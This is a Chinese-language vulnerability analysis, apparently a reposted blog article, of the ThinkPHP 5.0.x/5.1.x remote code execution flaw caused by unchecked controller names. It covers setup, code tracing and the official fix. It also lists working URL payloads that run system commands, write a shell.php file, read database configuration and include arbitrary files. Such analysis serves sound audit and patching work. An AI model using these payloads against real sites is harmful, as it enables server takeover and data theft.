這里寫目錄標題
- 漏洞概要
- 初始配置
- 漏洞利用
- 漏洞分析
- 漏洞修復
- 攻擊總結
漏洞概要
- 本次漏洞存在于 ThinkPHP 底層沒有對控制器名進行很好的合法性校驗,導致在未開啟強制路由的情況下,用戶可以呼叫任意類的任意方法,最終導致遠程代碼執行漏洞的產生
- 漏洞影響版本:
5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30
初始配置
獲取測驗環境代碼
composer create-project --prefer-dist topthink/think tpdemo
將 composer.json 檔案的 require 欄位設定成如下
"require": {
"php": ">=5.6.0",
"topthink/framework": "5.1.30"
},
然后執行
composer update
漏洞利用
Payload
5.1.x
?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
5.0.x
?s=index/think\config/get&name=database.username # 獲取配置資訊
?s=index/\think\Lang/load&file=../../test.jpg # 包含任意檔案
?s=index/\think\Config/load&file=../../t.php # 包含任意.php檔案
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
漏洞分析
默認情況下安裝的 ThinkPHP 是沒有開啟強制路由選項,而且默認開啟路由兼容模式
沒有開啟強制路由說明可以使用路由兼容模式
s引數,而框架對控制器名沒有進行足夠的檢測,說明可能可以呼叫任意的控制器,那么可以試著利用http://site/?s=模塊/控制器/方法來測驗一下;在先前的 ThinkPHP SQL注入 分析文章中有提到所有用戶引數都會經過Request類的input方法處理,該方法會呼叫filterValue方法,而filterValue方法中使用了call_user_func,那么來嘗試利用這個方法
http://127.0.0.1/cms/public/?s=index/\think\Request/input&filter[]=phpinfo&data=1
查閱其 commit 記錄,發現其增加了對控制器名的檢測
跟進
thinkphp/library/think/route/dispatch/Module.php,在$controller代碼段打下斷點,可以看到控制器的名字是從$result中獲取的,而$result的值來源于兼容模式下的pathinfo,即s引數
跟進
thinkphp/library/think/App.php,進入App類的run方法,進而呼叫Dispatch類的run方法,跟進thinkphp/library/think/route/Dispatch.php,發現該方法會呼叫關鍵函式exec
在
exec函式中,程式利用反射機制,呼叫類的方法,這里的類、方法、引數均是可控的,而且整個程序并沒有看到程式對控制器名的合法性進行檢測,這也是導致遠程代碼執行漏洞的直接原因
以上是針對 ThinkPHP5.1.x 版本的漏洞分析,如果直接拿該版本的 payload 去測驗 ThinkPHP5.0.x 版本,會發現很多 payload 都不能成功,其原因是兩個大版本已加載的類不同,導致可利用的類也不盡相同
ThinkPHP 5.1.x ThinkPHP 5.0.x
stdClass stdClass
Exception Exception
ErrorException ErrorException
Closure Closure
Generator Generator
DateTime DateTime
DateTimeImmutable DateTimeImmutable
DateTimeZone DateTimeZone
DateInterval DateInterval
DatePeriod DatePeriod
LibXMLError LibXMLError
DOMException DOMException
DOMStringList DOMStringList
DOMNameList DOMNameList
DOMImplementationList DOMImplementationList
DOMImplementationSource DOMImplementationSource
DOMImplementation DOMImplementation
DOMNode DOMNode
DOMNameSpaceNode DOMNameSpaceNode
DOMDocumentFragment DOMDocumentFragment
DOMDocument DOMDocument
DOMNodeList DOMNodeList
DOMNamedNodeMap DOMNamedNodeMap
DOMCharacterData DOMCharacterData
DOMAttr DOMAttr
DOMElement DOMElement
DOMText DOMText
DOMComment DOMComment
DOMTypeinfo DOMTypeinfo
DOMUserDataHandler DOMUserDataHandler
DOMDomError DOMDomError
DOMErrorHandler DOMErrorHandler
DOMLocator DOMLocator
DOMConfiguration DOMConfiguration
DOMCdataSection DOMCdataSection
DOMDocumentType DOMDocumentType
DOMNotation DOMNotation
DOMEntity DOMEntity
DOMEntityReference DOMEntityReference
DOMProcessingInstruction DOMProcessingInstruction
DOMStringExtend DOMStringExtend
DOMXPath DOMXPath
finfo finfo
LogicException LogicException
BadFunctionCallException BadFunctionCallException
BadMethodCallException BadMethodCallException
DomainException DomainException
InvalidArgumentException InvalidArgumentException
LengthException LengthException
OutOfRangeException OutOfRangeException
RuntimeException RuntimeException
OutOfBoundsException OutOfBoundsException
OverflowException OverflowException
RangeException RangeException
UnderflowException UnderflowException
UnexpectedValueException UnexpectedValueException
RecursiveIteratorIterator RecursiveIteratorIterator
IteratorIterator IteratorIterator
FilterIterator FilterIterator
RecursiveFilterIterator RecursiveFilterIterator
CallbackFilterIterator CallbackFilterIterator
RecursiveCallbackFilterIterator RecursiveCallbackFilterIterator
ParentIterator ParentIterator
LimitIterator LimitIterator
CachingIterator CachingIterator
RecursiveCachingIterator RecursiveCachingIterator
NoRewindIterator NoRewindIterator
AppendIterator AppendIterator
InfiniteIterator InfiniteIterator
RegexIterator RegexIterator
RecursiveRegexIterator RecursiveRegexIterator
EmptyIterator EmptyIterator
RecursiveTreeIterator RecursiveTreeIterator
ArrayObject ArrayObject
ArrayIterator ArrayIterator
RecursiveArrayIterator RecursiveArrayIterator
SplFileInfo SplFileInfo
DirectoryIterator DirectoryIterator
FilesystemIterator FilesystemIterator
RecursiveDirectoryIterator RecursiveDirectoryIterator
GlobIterator GlobIterator
SplFileObject SplFileObject
SplTempFileObject SplTempFileObject
SplDoublyLinkedList SplDoublyLinkedList
SplQueue SplQueue
SplStack SplStack
SplHeap SplHeap
SplMinHeap SplMinHeap
SplMaxHeap SplMaxHeap
SplPriorityQueue SplPriorityQueue
SplFixedArray SplFixedArray
SplObjectStorage SplObjectStorage
MultipleIterator MultipleIterator
SessionHandler SessionHandler
ReflectionException ReflectionException
Reflection Reflection
ReflectionFunctionAbstract ReflectionFunctionAbstract
ReflectionFunction ReflectionFunction
ReflectionParameter ReflectionParameter
ReflectionMethod ReflectionMethod
ReflectionClass ReflectionClass
ReflectionObject ReflectionObject
ReflectionProperty ReflectionProperty
ReflectionExtension ReflectionExtension
ReflectionZendExtension ReflectionZendExtension
__PHP_Incomplete_Class __PHP_Incomplete_Class
php_user_filter php_user_filter
Directory Directory
SimpleXMLElement SimpleXMLElement
SimpleXMLIterator SimpleXMLIterator
SoapClient SoapClient
SoapVar SoapVar
SoapServer SoapServer
SoapFault SoapFault
SoapParam SoapParam
SoapHeader SoapHeader
PharException PharException
Phar Phar
PharData PharData
PharFileInfo PharFileInfo
XMLReader XMLReader
XMLWriter XMLWriter
ZipArchive ZipArchive
PDOException PDOException
PDO PDO
PDOStatement PDOStatement
PDORow PDORow
CURLFile CURLFile
Collator Collator
NumberFormatter NumberFormatter
Normalizer Normalizer
Locale Locale
MessageFormatter MessageFormatter
IntlDateFormatter IntlDateFormatter
ResourceBundle ResourceBundle
Transliterator Transliterator
IntlTimeZone IntlTimeZone
IntlCalendar IntlCalendar
IntlGregorianCalendar IntlGregorianCalendar
Spoofchecker Spoofchecker
IntlException IntlException
IntlIterator IntlIterator
IntlBreakIterator IntlBreakIterator
IntlRuleBasedBreakIterator IntlRuleBasedBreakIterator
IntlCodePointBreakIterator IntlCodePointBreakIterator
IntlPartsIterator IntlPartsIterator
UConverter UConverter
JsonIncrementalParser JsonIncrementalParser
mysqli_sql_exception mysqli_sql_exception
mysqli_driver mysqli_driver
mysqli mysqli
mysqli_warning mysqli_warning
mysqli_result mysqli_result
mysqli_stmt mysqli_stmt
Composer\Autoload\ComposerStaticInit81a0c33d33d83a86fdd976e2aff753d9 Composer\Autoload\ComposerStaticInit8a67cf04fc9c0db5b85a9d897c12a44c
think\Loader think\Loader
think\Error think\Error
think\Container think\Config
think\App think\App
think\Env think\Request
think\Config think\Hook
think\Hook think\Env
think\Facade think\Lang
think\facade\Env think\Log
env think\Route
think\Db
think\Lang
think\Request
think\facade\Route
route
think\Route
think\route\Rule
think\route\RuleGroup
think\route\Domain
think\route\RuleItem
think\route\RuleName
think\route\Dispatch
think\route\dispatch\Url
think\route\dispatch\Module
think\Middleware
think\Cookie
think\View
think\view\driver\Think
think\Template
think\template\driver\File
think\Log
think\log\driver\File
think\Session
think\Debug
think\Cache
think\cache\Driver
think\cache\driver\File
漏洞修復
官方的修復方法是:增加正則運算式
^[A-Za-z](\w)*$,對控制器名進行合法性檢測
攻擊總結
參考Mochazz師傅的審計流程
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/294401.html
標籤:其他
上一篇:有關網路安全基礎知識
下一篇:計算機網路-網路應用(上)